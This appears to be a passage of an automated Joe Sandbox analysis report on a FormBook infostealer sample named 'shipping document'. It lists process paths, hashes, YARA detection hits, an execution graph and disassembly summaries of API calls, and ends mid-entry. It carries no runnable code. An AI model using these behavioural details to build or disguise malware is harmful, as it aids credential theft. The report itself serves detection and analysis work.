                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:07:25:45
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe"
                                                                                              Imagebase:0xb70000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:07:25:46
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                                                              Imagebase:0x370000
                                                                                              File size:60'416 bytes
                                                                                              MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:07:25:59
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe"
                                                                                              Imagebase:0xb70000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:07:26:11
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.9%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:52
                                                                                                Total number of Limit Nodes:3
                                                                                                execution_graph 18780 315ac10 18784 315acf9 18780->18784 18792 315ad08 18780->18792 18781 315ac1f 18785 315ad19 18784->18785 18786 315ad3c 18784->18786 18785->18786 18800 315af90 18785->18800 18804 315afa0 18785->18804 18786->18781 18787 315af40 GetModuleHandleW 18789 315af6d 18787->18789 18788 315ad34 18788->18786 18788->18787 18789->18781 18793 315ad19 18792->18793 18794 315ad3c 18792->18794 18793->18794 18798 315af90 LoadLibraryExW 18793->18798 18799 315afa0 LoadLibraryExW 18793->18799 18794->18781 18795 315af40 GetModuleHandleW 18797 315af6d 18795->18797 18796 315ad34 18796->18794 18796->18795 18797->18781 18798->18796 18799->18796 18802 315afa0 18800->18802 18801 315afd9 18801->18788 18802->18801 18808 315a090 18802->18808 18805 315afb4 18804->18805 18806 315afd9 18805->18806 18807 315a090 LoadLibraryExW 18805->18807 18806->18788 18807->18806 18809 315b180 LoadLibraryExW 18808->18809 18811 315b1f9 18809->18811 18811->18801 18812 315d5f0 DuplicateHandle 18813 315d686 18812->18813 18814 315cfa0 18815 315cfe6 GetCurrentProcess 18814->18815 18817 315d031 18815->18817 18818 315d038 GetCurrentThread 18815->18818 18817->18818 18819 315d075 GetCurrentProcess 18818->18819 18820 315d06e 18818->18820 18821 315d0ab 18819->18821 18820->18819 18822 315d0d3 GetCurrentThreadId 18821->18822 18823 315d104 18822->18823 18824 3154668 18825 3154669 18824->18825 18826 3154672 18825->18826 18828 3154759 18825->18828 18829 315477d 18828->18829 18833 3154868 18829->18833 18837 3154858 18829->18837 18834 315486d 18833->18834 18836 315496c 18834->18836 18841 31544c4 18834->18841 18839 3154868 18837->18839 18838 315496c 18838->18838 18839->18838 18840 31544c4 CreateActCtxA 18839->18840 18840->18838 18842 31558f8 CreateActCtxA 18841->18842 18844 31559bb 18842->18844 18844->18844

                                                                                                Executed Functions

                                                                                                Function 07C579C8 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 338 7c579c8-7c579eb 339 7c579f2-7c57a68 338->339 340 7c579ed 338->340 345 7c57a6b 339->345 340->339 346 7c57a72-7c57a8e 345->346 347 7c57a97-7c57a98 346->347 348 7c57a90 346->348 350 7c57be6-7c57c58 call 7c58cb8 347->350 348->345 348->347 349 7c57ab4-7c57af3 348->349 348->350 351 7c57a9d-7c57ab2 348->351 352 7c57b3f-7c57b69 348->352 353 7c57b6e-7c57ba4 348->353 354 7c57ba9-7c57bc5 348->354 355 7c57af8-7c57afc 348->355 356 7c57b28-7c57b3a 348->356 357 7c57bca-7c57be1 348->357 349->346 370 7c57c5e-7c57c68 350->370 351->346 352->346 353->346 354->346 358 7c57b0f-7c57b16 355->358 359 7c57afe-7c57b0d 355->359 356->346 357->346 360 7c57b1d-7c57b23 358->360 359->360 360->346
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Tedq$Tedq$)"
                                                                                                • API String ID: 0-1060934619
                                                                                                • Opcode ID: d2b5898bb6e27124ab0f06e9bb4017ae6584b548e31dcf38845b1c2ba71c9984
                                                                                                • Instruction ID: 21f1919f9efbffc87e0ef16996183b32b570e5af3879060cb49ec74e600052a1
                                                                                                • Opcode Fuzzy Hash: d2b5898bb6e27124ab0f06e9bb4017ae6584b548e31dcf38845b1c2ba71c9984
                                                                                                • Instruction Fuzzy Hash: CA81C5B4E142098FDB48CFAAC984AEEFBB2FF89310F14902AD815AB354D7355945CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C59B68 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 552 7c59b68-7c59b8d 553 7c59b94-7c59bd2 call 7c5a1a8 552->553 554 7c59b8f 552->554 556 7c59bd8 553->556 554->553 557 7c59bdf-7c59bfb 556->557 558 7c59c04-7c59c05 557->558 559 7c59bfd 557->559 568 7c59f94-7c59fa7 558->568 559->556 559->558 560 7c59c87-7c59c90 559->560 561 7c59f03-7c59f10 559->561 562 7c59dcc-7c59de1 559->562 563 7c59ecc-7c59ed8 559->563 564 7c59e49-7c59e55 559->564 565 7c59f48-7c59f5f 559->565 566 7c59c0a-7c59c21 559->566 567 7c59f15-7c59f27 559->567 559->568 569 7c59e16-7c59e2b 559->569 570 7c59c50-7c59c5c 559->570 571 7c59f64-7c59f68 559->571 572 7c59ea7-7c59ec7 559->572 573 7c59da7-7c59dc7 559->573 574 7c59de6-7c59dea 559->574 575 7c59d66-7c59d78 559->575 576 7c59ce1-7c59ced 559->576 577 7c59c23-7c59c27 559->577 578 7c59f2c-7c59f43 559->578 579 7c59e30-7c59e44 559->579 580 7c59d32-7c59d3e 559->580 581 7c59e7d-7c59e89 559->581 582 7c59d7d-7c59d89 559->582 583 7c59cbc-7c59cdc 559->583 592 7c59ca3-7c59caa 560->592 593 7c59c92-7c59ca1 560->593 561->557 562->557 586 7c59edf-7c59efe 563->586 587 7c59eda 563->587 600 7c59e57 564->600 601 7c59e5c-7c59e78 564->601 565->557 566->557 567->557 569->557 590 7c59c63-7c59c82 570->590 591 7c59c5e 570->591 594 7c59f7b-7c59f82 571->594 595 7c59f6a-7c59f79 571->595 572->557 573->557 596 7c59dfd-7c59e04 574->596 597 7c59dec-7c59dfb 574->597 575->557 598 7c59cf4-7c59d0a 576->598 599 7c59cef 576->599 584 7c59c29-7c59c38 577->584 585 7c59c3a-7c59c41 577->585 578->557 579->557 604 7c59d45-7c59d61 580->604 605 7c59d40 580->605 602 7c59e90-7c59ea2 581->602 603 7c59e8b 581->603 588 7c59d90-7c59da2 582->588 589 7c59d8b 582->589 583->557 607 7c59c48-7c59c4e 584->607 585->607 586->557 587->586 588->557 589->588 590->557 591->590 608 7c59cb1-7c59cb7 592->608 593->608 609 7c59f89-7c59f8f 594->609 595->609 613 7c59e0b-7c59e11 596->613 597->613 621 7c59d11-7c59d2d 598->621 622 7c59d0c 598->622 599->598 600->601 601->557 602->557 603->602 604->557 605->604 607->557 608->557 609->557 613->557 621->557 622->621
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tIh
                                                                                                • API String ID: 0-443931868
                                                                                                • Opcode ID: e41f79e0a7d28a8d502fc93665b4f3b9c8846d1e605f2797a51ce27010fa2d0d
                                                                                                • Instruction ID: a9a5b15748175a2652b9d9255be282198312760db21088be9631474e0d58628a
                                                                                                • Opcode Fuzzy Hash: e41f79e0a7d28a8d502fc93665b4f3b9c8846d1e605f2797a51ce27010fa2d0d
                                                                                                • Instruction Fuzzy Hash: 71D11BB0D2520ADFDB04CF9AC5858AEFBB2FF89300F14D595D815AB214D735AA82CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5CBC0 Relevance: .2, Instructions: 231COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 07ad3d74db3d264b56227c77b9d56c5227fea7f900de7a701443746429950224
                                                                                                • Instruction ID: 30e34f4719bab40bcf824734b187c8e5f6a4445cfc9b725e4389ac19a8e7956c
                                                                                                • Opcode Fuzzy Hash: 07ad3d74db3d264b56227c77b9d56c5227fea7f900de7a701443746429950224
                                                                                                • Instruction Fuzzy Hash: 58910CB0D1520ADFCB18CFE6D58199DFBB2FB89300F20A416E416B7264D735A945CF28
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5C8A8 Relevance: .2, Instructions: 204COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a5095356793b435389ed9512c82f30e2c93f2f3b785ea5f183090f9375dae911
                                                                                                • Instruction ID: 0f323a92e25c9d8568c8cb872324c11a34ae5f0a456ed664604ccb3aa087294a
                                                                                                • Opcode Fuzzy Hash: a5095356793b435389ed9512c82f30e2c93f2f3b785ea5f183090f9375dae911
                                                                                                • Instruction Fuzzy Hash: A08105B4E1421ADFCB14DFAAC9809EEFBB1FB89300F10955AD811B7254D7369942CF68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C58CB8 Relevance: .1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 035bfba8d1ebfe8e49f2bf5222b29fbea134f774bc43785ad7ba457495307ae7
                                                                                                • Instruction ID: 6ac05ac2f35b3f27b92dcb3aac46df3887bb7c939487bc6e7728ab5879d62011
                                                                                                • Opcode Fuzzy Hash: 035bfba8d1ebfe8e49f2bf5222b29fbea134f774bc43785ad7ba457495307ae7
                                                                                                • Instruction Fuzzy Hash: 4D210CB1E016188BEB18CF9BC9402DEFBF7AFC8310F14C06AD409A6214DB311A85CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315CF90 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 294 315cf90-315d02f GetCurrentProcess 298 315d031-315d037 294->298 299 315d038-315d06c GetCurrentThread 294->299 298->299 300 315d075-315d0a9 GetCurrentProcess 299->300 301 315d06e-315d074 299->301 303 315d0b2-315d0cd call 315d578 300->303 304 315d0ab-315d0b1 300->304 301->300 307 315d0d3-315d102 GetCurrentThreadId 303->307 304->303 308 315d104-315d10a 307->308 309 315d10b-315d16d 307->309 308->309
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D01E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0315D05B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D098
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0315D0F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 52777dad7b4ac1fb781b2c6571ae168f208c43f1c5c03dc1bfc042c19542ce3e
                                                                                                • Instruction ID: db5168dbb8525f7cb76c099cb7810bd481f09c1b9cebd78ebdd27b1c2e3350fd
                                                                                                • Opcode Fuzzy Hash: 52777dad7b4ac1fb781b2c6571ae168f208c43f1c5c03dc1bfc042c19542ce3e
                                                                                                • Instruction Fuzzy Hash: 005165B0901349CFDB54CFA9DA88B9EBBF1AF8C314F24845AE418A7390DB345945CB66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 316 315cfa0-315d02f GetCurrentProcess 320 315d031-315d037 316->320 321 315d038-315d06c GetCurrentThread 316->321 320->321 322 315d075-315d0a9 GetCurrentProcess 321->322 323 315d06e-315d074 321->323 325 315d0b2-315d0cd call 315d578 322->325 326 315d0ab-315d0b1 322->326 323->322 329 315d0d3-315d102 GetCurrentThreadId 325->329 326->325 330 315d104-315d10a 329->330 331 315d10b-315d16d 329->331 330->331
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D01E
                                                                                                • GetCurrentThread.KERNEL32 ref: 0315D05B
                                                                                                • GetCurrentProcess.KERNEL32 ref: 0315D098
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0315D0F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 0e8faa87f96e5c6769d0fadf537f39b87415f109621e1f14b7d4d22aaed27355
                                                                                                • Instruction ID: 2ddc4ce3e00fa03b42c21e4d003c5c21b98bc173bff2f1c9dff12a9e672c5f2a
                                                                                                • Opcode Fuzzy Hash: 0e8faa87f96e5c6769d0fadf537f39b87415f109621e1f14b7d4d22aaed27355
                                                                                                • Instruction Fuzzy Hash: B05154B0900309CFDB54CFAAD688B9EBBF1EF8C314F248459E418A7350DB346984CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5A1A8 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 413 7c5a1a8-7c5a1c6 414 7c5a1cd-7c5a1d5 call 7c5a2a0 413->414 415 7c5a1c8 413->415 416 7c5a1db 414->416 415->414 417 7c5a1e2-7c5a1fe 416->417 418 7c5a207-7c5a208 417->418 419 7c5a200 417->419 420 7c5a275-7c5a279 418->420 419->416 419->418 419->420 421 7c5a24e-7c5a270 419->421 422 7c5a20a-7c5a21e 419->422 421->417 424 7c5a231-7c5a238 422->424 425 7c5a220-7c5a22f 422->425 426 7c5a23f-7c5a24c 424->426 425->426 426->417
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 3H5$3H5
                                                                                                • API String ID: 0-2752242361
                                                                                                • Opcode ID: 73bc7972c8a7e1f85d561b0929527607a5a18b1b06a2d9a47963b579acd7ca0e
                                                                                                • Instruction ID: 6144b68561b495590ff4959c174097e29d02c047d20b2725359b78f21e168182
                                                                                                • Opcode Fuzzy Hash: 73bc7972c8a7e1f85d561b0929527607a5a18b1b06a2d9a47963b579acd7ca0e
                                                                                                • Instruction Fuzzy Hash: 352119B0D14209DFCB48DFAAC941AAEFFF1BF89300F24C56A9508B7214E7319A85CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315AD08 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 428 315ad08-315ad17 429 315ad43-315ad47 428->429 430 315ad19-315ad26 call 315a02c 428->430 432 315ad49-315ad53 429->432 433 315ad5b-315ad9c 429->433 436 315ad3c 430->436 437 315ad28 430->437 432->433 439 315ad9e-315ada6 433->439 440 315ada9-315adb7 433->440 436->429 487 315ad2e call 315af90 437->487 488 315ad2e call 315afa0 437->488 439->440 441 315adb9-315adbe 440->441 442 315addb-315addd 440->442 444 315adc0-315adc7 call 315a038 441->444 445 315adc9 441->445 447 315ade0-315ade7 442->447 443 315ad34-315ad36 443->436 446 315ae78-315aef4 443->446 449 315adcb-315add9 444->449 445->449 478 315aef6-315af1e 446->478 479 315af20-315af38 446->479 450 315adf4-315adfb 447->450 451 315ade9-315adf1 447->451 449->447 452 315adfd-315ae05 450->452 453 315ae08-315ae11 call 315a048 450->453 451->450 452->453 459 315ae13-315ae1b 453->459 460 315ae1e-315ae23 453->460 459->460 461 315ae25-315ae2c 460->461 462 315ae41-315ae45 460->462 461->462 464 315ae2e-315ae3e call 315a058 call 315a068 461->464 485 315ae48 call 315b290 462->485 486 315ae48 call 315b2a0 462->486 464->462 467 315ae4b-315ae4e 469 315ae71-315ae77 467->469 470 315ae50-315ae6e 467->470 470->469 478->479 480 315af40-315af6b GetModuleHandleW 479->480 481 315af3a-315af3d 479->481 482 315af74-315af88 480->482 483 315af6d-315af73 480->483 481->480 483->482 485->467 486->467 487->443 488->443
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0315AF5E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: dd955670e1ba3c783eecf4985c22f6e8738ae4c6f75206a6b25e6f4d84707121
                                                                                                • Instruction ID: 399079bd269e6ad84f28a89458b7491ab3774106ff6aae8c4dbeb48bd06d56ee
                                                                                                • Opcode Fuzzy Hash: dd955670e1ba3c783eecf4985c22f6e8738ae4c6f75206a6b25e6f4d84707121
                                                                                                • Instruction Fuzzy Hash: F4813570A00B05CFDB25DF29C44479ABBF5FF88304F048A6EE896DBA50D775A849CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 031558EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 489 31558ec-31558f6 490 31558fd-31559b9 CreateActCtxA 489->490 491 31558f8-31558fc 489->491 493 31559c2-3155a1c 490->493 494 31559bb-31559c1 490->494 491->490 501 3155a1e-3155a21 493->501 502 3155a2b-3155a2f 493->502 494->493 501->502 503 3155a31-3155a3d 502->503 504 3155a40 502->504 503->504 506 3155a41 504->506 506->506
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 031559A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 3aff9caa9e7b1e2c21547ac209103ec4e14c74374face26c2be946978357b194
                                                                                                • Instruction ID: 7dcef8d4bafa5d9945bd81690a6c0602acd190d71f47929958caf4fdb4dafd8c
                                                                                                • Opcode Fuzzy Hash: 3aff9caa9e7b1e2c21547ac209103ec4e14c74374face26c2be946978357b194
                                                                                                • Instruction Fuzzy Hash: 8441D1B0C00719CBDB24CFA9C984B9EBBB6BF49304F64806AE419AB251DB756945CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 031544C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 507 31544c4-31559b9 CreateActCtxA 511 31559c2-3155a1c 507->511 512 31559bb-31559c1 507->512 519 3155a1e-3155a21 511->519 520 3155a2b-3155a2f 511->520 512->511 519->520 521 3155a31-3155a3d 520->521 522 3155a40 520->522 521->522 524 3155a41 522->524 524->524
                                                                                                APIs
                                                                                                • CreateActCtxA.KERNEL32(?), ref: 031559A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create
                                                                                                • String ID:
                                                                                                • API String ID: 2289755597-0
                                                                                                • Opcode ID: 0fe2d6872f0c8bd80bad78a549ad416277772053b29d6eef96c12643e92942cd
                                                                                                • Instruction ID: 36e128ecda1fdaf29d913f39713b432b41545fab42d4f2bbe738167202756149
                                                                                                • Opcode Fuzzy Hash: 0fe2d6872f0c8bd80bad78a549ad416277772053b29d6eef96c12643e92942cd
                                                                                                • Instruction Fuzzy Hash: 0241CFB0C00719CBDB24DFA9C984B9EBBB6BF49304F60806AE419AB251DB756945CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315D5E8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 525 315d5e8-315d5ec 526 315d632-315d684 DuplicateHandle 525->526 527 315d5ee-315d62f 525->527 528 315d686-315d68c 526->528 529 315d68d-315d6aa 526->529 527->526 528->529
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0315D677
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: b917a799dfbf927122722ece078246b225084774596ac5b382685da01b66b99e
                                                                                                • Instruction ID: 2a56ea05d7dbb25cc591af7b6f375d751040fd97094fd91b15a00fada3644451
                                                                                                • Opcode Fuzzy Hash: b917a799dfbf927122722ece078246b225084774596ac5b382685da01b66b99e
                                                                                                • Instruction Fuzzy Hash: DB2137B5800249DFDB10CFA9D584BDEBFF4AB08320F28815AE968A7251C378A941CF61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 532 315d5f0-315d684 DuplicateHandle 533 315d686-315d68c 532->533 534 315d68d-315d6aa 532->534 533->534
                                                                                                APIs
